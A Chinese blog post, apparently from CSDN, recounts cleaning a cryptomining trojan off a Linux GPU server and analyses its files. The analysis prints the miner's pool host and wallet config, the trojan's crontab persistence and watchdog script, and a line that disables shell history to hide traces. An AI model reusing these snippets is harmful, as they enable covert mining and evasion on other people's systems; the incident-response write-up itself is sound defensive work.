处理服务器上的挖矿木马小记

最新推荐文章于 2024-01-11 10:50:42 发布
VIP文章 最新推荐文章于 2024-01-11 10:50:42 发布
阅读量2.2k 收藏 4
点赞数 1
分类专栏: 杂记 开发 文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq455980324/article/details/121323948
版权

文章目录

处理服务器上的挖矿木马小记

挖矿木马发现

  • 通过nvidia-smi发现异常占用程序python36
nvidia-smi

Untitled

挖矿程序定位(失败)

  • 通过ps命令获取进程相关信息
ps -ef | grep python36

Untitled

  • 经观察,发现/bin/python36/bin/config.py每小时由root重新创建一次且运行,怀疑设定了cron定时任务,但检索各种cron配置无果。
查看用户定时任务:crontab -l
编辑用户定时任务:crontab -e
路径存放处:
/etc/crontab
/var/spool/cron/root
/var/spool/cron/crontabs/root
  • systemctl查看父进程信息
systemctl status 59744

Untitled

确实是使用了cron设置定时任务

  • 查看/tmp下是否有可疑文件,并没有,清得挺干净

Untitled

异常用户排查

  • 排查/etc/passwd,发现异常用户roo1,先用pwck修复密码文件,然后将其删除
pwck
userdel -r roo1

Untitled

Untitled

挖矿程序定位(成功)

  • 根据/bin/python36挖矿程序的大小进行查找,发现在/opt/.opt里有可疑程序,执行后确认为挖矿木马相关的所有程序!

Untitled

find / -size 5222752c

Untitled

Untitled

Untitled

挖矿木马分析

Untitled

每次运行,会修改dir.dir、cron.d、upd、bash.pid(进程号)、.a(日志文件)

1:lolMiner程序

2:config文件内容(挖矿账号)

algo=ETHASH
pool=node.universitynetservice1979.info:12020
tls=on
user=0xfff23333c1cb3a3c9db8a0d781383cdc2c00b6da.XXXUSERXXX

a:写入upd,写入crontab,运行run(最开始的一次)

pwd > dir.dir
dir=$(cat dir.dir)
#echo "* * * * * $dir/upd >/dev/null 2>&1" > cron.d
echo "@reboot $dir/upd >/dev/null 2>&1" >> cron.d
crontab cron.d
crontab -l | grep upd
echo "#!/bin/sh
if test -r $dir/bash.pid; then
pid=\$(cat $dir/bash.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
sleep 1
else
cd $dir
./run &>/dev/null
exit 0
fi
fi" >upd
chmod u+x upd
./run &>/dev/null

bash.pid:

61731

c:“善后”程序,清理各种可疑痕迹

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ;
最低0.47元/天 解锁文章
路边的水沟
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
python木马_kworkerds 木马简单分析及清理
weixin_39952800的博客
12-06 634
公司之前的开发和测试环境是在腾讯云上,部分服务器中过一次木马 kworkerds,本文为我当时分析和清理木马的记录,希望能对大家有所帮助。现象top 命令查看,显示 CPU 占用 100%,进程名无明显规则,如:TzBeq3AM。进程有时候会被隐藏,通过分析脚本删除部分依赖文件,可以显示出来。存在可疑的 python 进程。crontab 被写入了一个定时任务,每半小时左右会从 pastebi...
Beatles小记
03-02
这篇小记主要处于两方面考虑:首先,希望打破一提到海量数据分析,就只有hadoop基础上的一系列工具,更多的时候很多企业需要的是更轻量的设计(办喜酒杀猪杀鸡未必都要用一把刀),因此将开放平台基础分析组件重构版本beatles的设计写出来,给出更多的思考空间。其次,也是希望推广一种思想,所有的系统,框架设计简化(可扩展),小部件精致化,这样才能让很多项目能够整体灵活,细节给力。这篇小记一共分成4部分,概述,整体设计,局部设计,待续。如果你只想了解个背景,那么看完概述即可,如果对于流式分析的大框架设计感兴趣(看看省略了分布式计算集群的什么?核心设计是怎么样的),请仔细看完整体设计。如果还对代码优化有
python进行爬虫小记
01-15
python进行爬虫小记,主要用于python快速入门理解。
Scrum过程实践小记
02-26
严格来说,不能算是真正的scrum实践,但实践敏捷的过程本身也是一种“敏捷方法”,所以就算是“敏捷实践之敏捷开发方法-scrum过程”吧。1.Scrum团队(5-7个人的小项目组)。  2.Backlog:急待完成的一系列任务,包括:未细化的产品功能要求、Bugs、缺陷、用户提出的改进、具竞争力的功能及技术升级等,按优先级定义出来,这些任务可能不是完整的,甚至可能随时会更改或添加。3.Sprint(冲刺):通常为30天的迭代时间,把Backlog中的每一项安排在Sprint中,由团队估算出所需要的时间(按小时记)。每一次Sprint之后,一定要有可以交付使用的功能。4.Scrum会议:这是与传
《应急响应》记一次“XMR门罗币木马病毒”处置
1
11-03 1760
故事的起因于26号下午做渗透测试时,登录跳板机发现CPU进程拉满到200%,qiao哥看了一眼直接说是XMR,这句话勾引起我的兴趣,由于应急是我的薄弱项也没有时间深入学习,所以有本篇应急分析文章。
样本流程分析
test\\的博客
11-15 2362
样本流程分析背景:初步排查思路:态势感知排查该家族思路:流量样本:提取样本中特征:样本分析:脚本c:运行起始脚本a:生成dir.dir文件:同级目录产生cron.d:定期执行upd 脚本文件:Bash.pid文件:执行 run脚本: 背景: 内网发现某台主机大量资源占用,态势感知告警行为。 内网流程: 初步排查思路: 公网池为单一地址,威胁情报未标记,根据流量特征判断为池,可作为依据使用态势感知批量查找建立过连接的主机。 通过态势感知排查流量特征,内网传输情况。 内网多台池,
病毒应急响应思路,病毒事件处理步骤
热门推荐
wangyuxiang946的博客
05-05 2万+
首先根据CPU占用率确定确定进程,找到母体文件并清除。 而后是检查计划任务、启动项中,木马的持久化操作,杜绝复发。 最后通过账号、日志、母体文件等信息,溯源攻击路径。
Linux服务器被黑用作机的排查过程 ld-linux-x86-64 占用CPU过高
山水牧羊
08-22 3179
2019年8月22日 今天一台测试用服务器出现异常,最终确定是病毒,分享一下排查处理过程。 现象 1.ld-linux-x86-64进程占用CPU 90%,用户为oracle。 2.手工kill掉过一会还会再出现。 排查过程 1.切换到oracle用户,su - oracle 2.查看定时任务,crontab -e,发现有如下定时任务 /home/oracle/.cac...
驱动人生木马分析与处置
最新发布
beichenyyds的博客
01-11 1215
样本分析
网络安全之认识木马
学而思(xiejava的blog)
02-21 8269
目前,我国政府宣布要实现碳达峰碳中和的目标,严重耗能的虚拟加密币相关生产、交易被认定为非法,我国境内所有(生产加密货币的)场必须关闭。因需要大量财力投入,从一开始,就有人想到利用木马控制他人的计算机组建僵尸网络集群的办法,这就是所谓“木马”。
什么是木马?我猜你还不知道
yy1715713348的博客
12-19 981
由于区块链技术热炒以及数字货币魔性推广运营,如比特币、以太币、门罗币、达世币等层出不穷的数字货币各种热炒,在这些的利益驱使下便出现各种模式的木马程序。木马主要就是通过利用各种手段,将程序植入到用户的计算机中,在用户不知情的情况下,偷偷利用用户的计算机进行执行功能,从而获取收益。1.用户往往在不注意的时候,下载并运行了来历不明的破解软件或不安全软件;2.用户点击运行了钓鱼邮件中的附件的文件;3.用户没有做好系统及时更新,通过系统漏洞传播;
针对木马的一些基本认识
Macro2的博客
04-26 2747
区块链 什么是 为啥要 什么是池 什么是钱包 怎么 怎么发现和预防 区块链 区块链是一种分布式的数据库,区块链中每一个区块可以用来记录多笔交易数据(如比特币的交易数据,A->B转账1个bit币),多个区块以链条式的方式串联在一起,就可以称为区块链。比特币就是利用区块链技术来实现去中心化。相当于你下载比特币客...
典型家族系列分析四丨LemonDuck僵尸网络
qq_44005305的博客
09-14 651
”是指通过执行工作量证明或其他类似的电脑算法来获取虚拟货币,“”代表的是虚拟货币,的工人通常称为“工”。而“木马”是一种集成化恶意代码,能够通过各种手段将程序植入受害者的计算机中,在用户不知情的情况下,利用受害者计算机的运算力进行,从而获取非法收益。这类非法入侵用户计算机的程序被称作木马方式有两种:一种是solo式(直接连入中心网络工作),产出收益均归自己所有;另一种是连入池,收益与池分成。
木马总结
luckc7的博客
06-09 1367
木马总结与案列分享
python木马_记一次阿里云被植入木马的事件
weixin_39929877的博客
12-06 396
今天上午同事说我负责的那个模块不工作了,我登录了一下阿里云服务器排查一下,发现服务器运行很慢。(因为你敲的命令字符回传的很快,但是命令的响应时间长,所以是服务器卡了,而不是网络的问题)使用top查看一下,发现:[root@xxx ~]# top%Cpu(s): 99 us, 0.8 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0stPI...
python木马_centos7系统被入侵,挂载木马-pamdicks-(1)临时处理
weixin_39968820的博客
12-06 210
###故障说明故障环境配置 开发测试服务器(腾讯云); 系统:centos7 ; 程序启动模式:root用户直接启动; 网络环境:所有端口全部对外开放(使用仅屏蔽部分关键端口ssh,redis,rabbitmq等); 为方便服务器间数据传输方便,采用了ssh互信方式。故障现象 开发使用过程中,发现经常有服务无故关闭,登录服务器经检查,发现CPU使用率达到100%。 在检测异常进程中,未发现CPU使...
记一次linux木马的处置
beichenyyds的博客
09-15 4011
linux服务器木马处置
记·Windows病毒应急响应
chongya927的博客
02-28 1844
Windows病毒应急响应
一次木马病毒排查过程
vbaspdelphi的专栏
04-17 8154
兰眼发现该机器与网站有通信。通知用户进行查杀。电话得知北京刘工不方便,我们商讨后由我们代为安装火绒和rdpguard软件。 经过查杀,将RAR病毒处理后,截止到11:15,已经没有了病毒表现。 但是使用火绒再次扫描系统,依旧发现有文件映像劫持。大体意思是图片文件扩容属性运行taskmgr.exe。 那么什么是映像劫持呢? 什么是映像劫持 也许你曾遇到过这种情况:无论你将软件安装在什么地方,在运...
protobuff使用小记
05-31
下面是使用Protobuf的一些小记: 1. 定义消息格式 首先,需要定义消息格式,以便Protobuf可以将数据序列化和反序列化。消息格式定义在.proto文件中,使用protobuf语言编写。例如,下面是一个简单的消息格式定义: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值